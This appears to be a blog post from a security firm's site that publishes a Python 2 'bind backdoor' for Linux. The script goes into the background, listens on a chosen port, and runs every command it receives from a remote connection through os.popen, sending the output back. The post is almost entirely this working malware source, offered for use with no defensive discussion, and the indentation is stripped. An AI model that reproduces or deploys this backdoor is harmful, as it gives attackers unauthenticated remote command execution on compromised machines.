Bind Backdoor for Linux

#!/usr/bin/python
#Info : This is a linux based bind backdoor and
# this is NOT an interactive Shell!
#Author : otoy
#Date : 0x102010
#Blog : otoyrood.wordpress.com

import socket,sys,os,re

def daemonize():
pid = os.fork()
if(pid != 0):
os._exit(0)

def main():
if len(sys.argv) < 2:
print "Usage:",sys.argv[0],"<port>"
sys.exit(1)
UID = os.getlogin()
CWD = os.getcwd()
STM = os.uname()
if UID == 'root':
SIGN = ' # '
else:
SIGN = ' $ '
ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
port = int(sys.argv[1])
ls.bind(('', port))
ls.listen(1)
(conn, addr) = ls.accept()
try:
while (1):
bdsh = UID+'@'+STM[1]+':'+CWD+SIGN
conn.send(bdsh)
pktcmd = conn.recv(1024)
rcmd = pktcmd.strip()
cdir = re.findall('cd (.*)',rcmd)
try:
os.chdir(cdir[0])
CWD = os.getcwd()
except OSError:
conn.send('No such file or directory: '+cdir[0])
except IndexError:
pass
if rcmd == 'quit':
conn.close()
sys.exit(1)
elif rcmd == '':
rcmd = 'echo " "'
lcmd = os.popen(rcmd)
cmdstr = lcmd.read().strip()
conn.send(cmdstr+'n')
except(socket.error):
conn.close()
sys.exit(1)

if __name__ == '__main__':
try:
daemonize()
main()
except(KeyboardInterrupt):
sys.exit(1)

in action:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About Spentera

We are specializing in penetration test, vulnerability assessment, computer forensics, as well as intrusion analyst and malware analysis. Customers can contact us directly at contact[at]spentera[dot]id, or use Contact Our Team menu on the sidebar.